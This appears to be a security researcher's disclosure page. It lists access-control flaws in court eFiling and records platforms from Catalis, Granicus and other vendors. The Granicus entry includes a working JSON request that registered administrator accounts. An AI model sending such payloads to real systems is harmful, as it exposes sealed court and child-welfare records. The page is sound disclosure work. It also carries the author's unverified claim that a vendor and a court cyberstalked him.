2024-04-??
An insufficient permission check vulnerability in VendorC's court eFiling platform allows an attacker to view eFiling submissions (and their associated documents, regardless of confidentiality) filed by other users.
2024-04-??
Multiple vulnerabilities in VendorB's court eFiling platform allow an attacker to obtain the name, email, and phone number associated with every account; modify details of user accounts, including password and other sensitive information; deny access to user accounts; and gain administrator privileges.
2024-05-04
An insufficient permission check vulnerability in Catalis's EZ-Filing v4 eFiling platform allowed authenticated attackers to extract personal data, such as names, addresses, emails, and phone numbers, from user accounts by manipulating POST requests. This security flaw exposes users to potential identity theft and fraud.
EZ-Filing v4 is used by Georgia and South Carolina.
2024-05-04
An insufficient permission check vulnerability in Catalis's EZ-Filing v3 eFiling platform allowed authenticated users to access sealed documents, such as mental health reports in guardianship cases, exposing highly sensitive and confidential information. This security flaw compromises the privacy and safety of vulnerable individuals involved in legal proceedings.
EZ-Filing v3 is used by Maine.
2024-03-06
Insufficient permission check vulnerabilities in Granicus's GovQA allowed unauthorized access to view, edit, and change ownership of open records requests, including restricted-access confidential records. By changing ownership of a request, an attacker could effectively deny a legitimate user's access to that request. The vulnerabilities affected various deployments, including numerous Departments of Children and Family Services or their equivalents, which handle highly sensitive records of domestic violence and sexual abuse allegations against children.
2024-03-02
Vulnerabilities in Granicus's eFiling platform allowed attackers to register accounts in any organization of their choosing, including the organization that granted administrator privileges. Administrators have carte blanche access to all filings in all cases. Additionally, an organization owner could force any user into their own organization, which allowed the organization owner to effectively revoke privileges of administrators or other organization owners.
Granicus's eFiling platform is used statewide in Florida and Arizona.
Administrator accounts could be registered by sending a POST to /api/Security/RegisterUser with the following JSON.
{
"User":{
"OrganizationId":"0","IsAdministrator":true,"UserTypeCode":"10",
"IdType":-1,"IdTypeSpecified":false,"IdState":"-1","IdNumber":"",
"LogonName":"<username>","LogonPassword":"<password>",
"FirstName":"Example","MiddleName":"","LastName":"User","Suffix":"",
"PrimaryEmailAddress":"fake@example.com","AlternateEmailAddress1":"","AlternateEmailAddress2":"",
"Address1":"123 Fake St","Address2":"","City":"Beverly Hills","State":"CA","ZipCode":"90210",
"Country":"US","CountryCode":"US","PhoneNumber":"","PhoneExtension":""
},"ForceToPendingApproval":false,"ForceCreateUser":false
}Note: Shortly after receiving my report, Granicus evidently leaked my information to the Arizona Supreme Court. For the next two months, Granicus and the Arizona Supreme Court cyberstalked me; my LinkedIn profile was viewed repeatedly, sometimes multiple times per day, by several employees from each company.
2023-11-30
Insufficient permission check vulnerabilities in public court record platforms from multiple vendors allowed unauthorized public access to sealed, confidential, unredacted, and/or otherwise restricted case documents. Affected documents include witness lists and testimony, mental health evaluations, child custody agreements, detailed allegations of abuse, corporate trade secrets, jury forms, and much more.
- All Vendors (Combined)
- Catalis -- CMS360
- Henschen & Associates -- CaseLook
- Tyler Technologies -- Court Case Management Plus
- Florida
- Brevard County
- Hillsborough County
- Lee County
- Monroe County
- Sarasota County
2023-11-06
- Leaked personal data of inmates and officers.
2023-09-13
- Abitrary text descriptions and thumbnails in link cards.
- Disguised links in post text.
- Email: north@ꩰ.com
- Press: press@jeltz.org
- Mastodon: @north@ꩰ.com
- If you enjoy my work, consider becoming a sponsor on Patreon or GitHub, and/or consider donating to the Electronic Frontier Foundation or St. Jude. Many hours of labor are put into researching and disclosing vulnerabilities.
